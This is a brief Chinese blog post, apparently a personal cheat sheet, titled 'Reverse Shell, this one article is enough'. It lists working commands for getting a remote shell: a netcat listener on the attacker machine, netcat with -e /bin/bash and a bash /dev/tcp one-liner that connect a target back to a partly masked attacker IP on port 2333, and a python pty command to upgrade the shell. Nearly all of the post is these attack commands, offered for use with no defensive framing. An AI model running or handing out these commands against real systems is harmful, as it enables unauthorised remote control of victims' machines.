反弹Shell,看这一篇就够了

https://xz.aliyun.com/t/9488


攻击机开启本地监听:

netcat -lvvp 2333

目标机主动连接攻击机:

netcat 47.xxx.xxx.187 2333 -e /bin/bash
# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash

bash -i >& /dev/tcp/47.xxx.xxx.187/2333 0>&1

借助于python默认包含的一个pty标准库来获取一个标准的虚拟终端环境
python -c "import pty;pty.spawn('/bin/bash')"

posted @ 2022-05-31 17:01  katago  阅读(68)  评论(0)    收藏  举报